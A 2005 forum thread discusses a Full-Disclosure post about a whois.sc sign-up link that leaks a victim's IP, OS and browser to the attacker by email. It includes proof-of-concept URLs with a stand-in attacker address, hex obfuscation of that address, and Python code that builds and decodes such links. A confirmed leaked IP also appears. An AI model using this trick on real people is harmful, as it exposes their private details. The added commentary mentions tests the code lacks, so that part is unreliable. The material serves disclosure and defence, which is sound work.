

Getting somebody's ip, browser, os, etc

Started by iago, November 03, 2005, 09:58:35 AM



iago

This really isn't terribly exciting, but it's a neat trick, and it shows some creative thought.  And that's one of the main principles of hacking: you've gotta think outside the box.

Quote:
Title: whois.sc not-big-deal hole
Server-side risk: none
Client-side risk: low risk (private info revealed about the user)

Description:

This might not even be considered a proper security hole, but I
thought it's an interesting way to get the following information about
a user:

- IP Address
- Operating system
- Web browser version

This information can be easily obtained by "tricking" someone to visit
your website and then checking the webserver logs. Email headers also
help, not to mention loud OS detection tools such as xprobe2 and nmap
(which will only work if you're lucky and the "victim" doesn't use a
firewall blocking all incoming traffic).

In this case however, the scenario is a little different because we
use a sign-up service provided by an existing website for our own
purposes (enumeration).

The only limitation of this "trick" is that the attacker needs to use
a different email address for each attack. This is because whois.sc
will set the account activation status to "pending" after requesting
the account activation with your email address for the first time.


The original request to sign-up for an account is a POST request
*similar* to the following:


POST http://www.whois.sc/members/process.html HTTP/1.1
Host: www.whois.sc
Content-Length: 48
action=newaccount&doneurl=&email=test%40test.com


However we can change the request from POST to GET and the application
will happily process the query:

http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=test%40test.com


PoC:

http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=attacker%40evilmail.com


Replace "attacker%40evilmail.com" in the previous link with your own
email address (e.g.: myself%40gmail.com) and send it to the "victim".


Also, we could obfuscate our email address by encoding it to hex:

http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=%61%74%74%61%63%6B%65%72%40%65%76%69%6C%6D%61%69%6C%2E%63%6F%6D


Note: "%40" is "@" in hex. For a good resource to convert strings to
different encodings check out
http://www.thedumbterminal.co.uk/php/stringdecode.php



Regards,

pagvac
Earth, SOLAR SYSTEM
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
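As an added example (not part of pagvac's post and not whois.sc's code), here is a small Python helper that does what the write-up describes: it rewrites the sign-up POST as a GET link, applies the hex obfuscation of the email address, and, more usefully for the person receiving such a link, decodes it back to plain text so the real destination and parameters are visible. The host, path, parameter names and the doubly encoded doneurl value are taken from the post; the function names and the decode-until-stable loop are this example's own.

```python
# Added example, not code from the original post or from whois.sc: build the
# GET form of the sign-up request described above and decode such links.
# The host, path and parameter names come from the post; the helper names
# and the double-decoding loop are this example's own.
from urllib.parse import urlsplit, parse_qs, unquote, quote

BASE = "http://www.whois.sc/members/process.html"   # endpoint named in the post


def hex_encode(s: str) -> str:
    """Percent-encode every byte, the 'hex' obfuscation shown in the post
    ('attacker@evilmail.com' -> '%61%74%74%61%63%6B%65%72%40...')."""
    return "".join("%%%02X" % b for b in s.encode("utf-8"))


def build_signup_link(email: str, doneurl: str = "/reverse-ip/",
                      obfuscate: bool = False) -> str:
    """Rewrite the POST sign-up as a GET link.

    doneurl is percent-encoded twice ('/' -> %2F -> %252F), matching the
    link in the post, so the application must decode it twice to use it."""
    email_part = hex_encode(email) if obfuscate else quote(email, safe="")
    doneurl_part = quote(quote(doneurl, safe=""), safe="")
    return f"{BASE}?action=newaccount&doneurl={doneurl_part}&email={email_part}"


def decode_link(url: str) -> dict:
    """Decode a link until nothing changes, so hex-obfuscated or
    double-encoded values read as plain text. This is the check a
    recipient should run before clicking: where does it really go, and
    what does it submit?"""
    parts = urlsplit(url)
    params = {}
    for key, vals in parse_qs(parts.query, keep_blank_values=True).items():
        value = vals[0]
        while True:                      # parse_qs decoded once already
            decoded = unquote(value)
            if decoded == value:
                break
            value = decoded
        params[key] = value
    return {"host": parts.netloc, "path": parts.path, "params": params}


if __name__ == "__main__":
    link = build_signup_link("attacker@evilmail.com", obfuscate=True)
    print(link)
    print(decode_link(link))
```

Running the script prints the same obfuscated PoC link as in the post and then its decoded form, with the email address and the /reverse-ip/ redirect target in the clear. The decode loop matters because a single unquote() of the doneurl value still leaves %2F in it; an attacker can stack encodings, so a defender keeps decoding until the string stops changing.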


deadly7

Neat. Though, with cPanel (I'm pretty sure Apache gives logs of visitors, too) it's pretty easy to get all of that information, and with PHP writing to a text file.

iago

That's assuming you have a web server. 

And by the way, it works:
Quote:
---------------------------------------------------
NOTE: You received this message because someone from
142.161.170.11(Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8b5) Gecko/20051025 Firefox/1.4.1)
requested an account for this email address. If you
did not request this account please ignore this message
and you will not be contacted again.
---------------------------------------------------

zorm

Just goes to show the problem with using something like $_REQUEST instead of $_POST in PHP.

Sidoh

Quote from: zorm on November 05, 2005, 12:36:13 AM
Just goes to show the problem with using something like $_REQUEST instead of $_POST in PHP.
You can spoof POST variables with little more effort.

iago

To spoof POST variables, you'd have to have a website, and convince them to click a "submit" button.  With GET variables, you can give them an obfuscated link, which could be done on an IM, a forum, in an email, etc..  And on IE for sure, there are several ways to hide where a link is actually sending you to. 

Sidoh

Quote from: iago on November 05, 2005, 03:01:45 PM
To spoof POST variables, you'd have to have a website, and convince them to click a "submit" button.  With GET variables, you can give them an obfuscated link, which could be done on an IM, a forum, in an email, etc..  And on IE for sure, there are several ways to hide where a link is actually sending you to. 


I kind of misunderstood the exploit, but now I see what it's doing.  Additionally, you could send them to a link on your site (containing the proper information), which submits a POST form to that website containing information in the URL you sent the person you're attacking.
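To make zorm's $_REQUEST point and Sidoh's form-submitting-page point concrete, here is an added Python model of the server side; it is not code from this thread or from whois.sc, and the Request class, the token scheme and the secret are this example's own assumptions. The vulnerable handler reads from the merged GET+POST parameters, the way PHP's $_REQUEST works, so the plain link in the write-up triggers it. The hardened handler requires POST and a session-bound token: the method check alone would stop the bare link but not a page on an attacker's site that auto-submits a POST form, which is why the token is needed as well.

```python
# Added example, not from the thread or from whois.sc: a model of the
# server side, to show the $_REQUEST problem zorm raises and why
# requiring POST alone does not stop the form-submitting page Sidoh
# describes. Request, the token scheme and the secret are assumptions.
import hashlib
import hmac
from urllib.parse import parse_qs

SECRET_KEY = b"example-only-server-secret"   # assumption: per-server secret


class Request:
    """Minimal stand-in for an HTTP request: method, query string, form
    body and the session cookie the browser attached."""

    def __init__(self, method, query="", body="", session_id=""):
        self.method = method
        self.GET = {k: v[0] for k, v in parse_qs(query).items()}
        self.POST = {k: v[0] for k, v in parse_qs(body).items()}
        self.session_id = session_id

    @property
    def REQUEST(self):
        # PHP's $_REQUEST: GET and POST merged, so the handler can no
        # longer tell a clicked link from a submitted form.
        merged = dict(self.GET)
        merged.update(self.POST)
        return merged


def process_vulnerable(req):
    """Reads the merged parameters, so the GET link in the write-up
    triggers the sign-up mail exactly like the real POST form."""
    p = req.REQUEST
    if p.get("action") == "newaccount" and "email" in p:
        return ("sent", p["email"])
    return ("ignored", None)


def csrf_token(session_id):
    """Token bound to the session with an HMAC (assumption; any
    unguessable value stored per session would do)."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def process_hardened(req):
    """POST only, plus a session-bound token.

    The method check stops the bare link; the token stops a page on the
    attacker's site that auto-submits a POST form, because that page can
    make the victim's browser send its cookie but cannot read the token."""
    if req.method != "POST":
        return ("rejected", "method")
    if not req.session_id:
        return ("rejected", "session")
    expected = csrf_token(req.session_id)
    if not hmac.compare_digest(req.POST.get("csrf", ""), expected):
        return ("rejected", "csrf")
    if req.POST.get("action") == "newaccount" and "email" in req.POST:
        return ("sent", req.POST["email"])
    return ("ignored", None)


if __name__ == "__main__":
    link_qs = "action=newaccount&doneurl=%252Freverse-ip%252F&email=attacker%40evilmail.com"
    print(process_vulnerable(Request("GET", query=link_qs, session_id="s1")))
    print(process_hardened(Request("GET", query=link_qs, session_id="s1")))
```

The last rejection case in the tests is the one that matters for Sidoh's variant: a POST arriving with the victim's cookie but with a token the attacker computed for some other session is still refused, so controlling a site does not buy the attacker anything beyond what his own server logs already give him.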

iago

Quote from: Sidoh on November 05, 2005, 03:09:07 PM
I kind of misunderstood the exploit, but now I see what it's doing.  Additionally, you could send them to a link on your site (containing the proper information), which submits a POST form to that website containing information in the URL you sent the person you're attacking.

True, but you still need to control a site.  :-P

Yes, your way is possible, but much harder to "exploit"

Sidoh

Quote from: iago on November 05, 2005, 04:03:27 PM
True, but you still need to control a site.  :-P

Yes, your way is possible, but much harder to "exploit"

It wouldn't be difficult at all, IMO.

iago

Then can you post a link on this forum that'll do it for me, without going through your own site?  Can you email me a link that'll do it without going through another site?  Can you IM or PM me a link that'll do it, without going through another site? 

And, if you're going through your own site, then you can check the logs anyway, so you aren't gaining any advantage. 

Sidoh

Quote from: iago on November 05, 2005, 06:10:20 PM
Then can you post a link on this forum that'll do it for me, without going through your own site?  Can you email me a link that'll do it without going through another site?  Can you IM or PM me a link that'll do it, without going through another site? 

And, if you're going through your own site, then you can check the logs anyway, so you aren't gaining any advantage. 

Where in your first proposition did you say I couldn't use my own website? :(

iago

Quote from: Sidoh on November 05, 2005, 06:22:38 PM
Where in your first proposition did you say I couldn't use my own website? :(

Quote from: iago on November 05, 2005, 04:03:27 PM
True, but you still need to control a site.  :-P

Yes, your way is possible, but much harder to "exploit"

Sidoh

Quote from: iago on November 05, 2005, 07:04:09 PM
Quote from: iago on November 05, 2005, 04:03:27 PM
True, but you still need to control a site. :-P

Yes, your way is possible, but much harder to "exploit"

I do control a site and it's still possible!  T_T

Hehe, this is a pretty useless argument, though.  I think it'd be just as easy to trick someone into visiting your website so you could log their IP address.

Ergot

Quote from: Sidoh on November 05, 2005, 07:14:49 PM
I do control a site and it's still possible!  T_T

Hehe, this is a pretty useless argument, though.  I think it'd be just as easy to trick someone into visiting your website so you could log their IP address.
Yea... Just like I can trick people into clicking random things ... (Like the whole Outwar thing).
My friends (in real life (yes, I do have real-life friends!)) don't trust my links anymore though :(
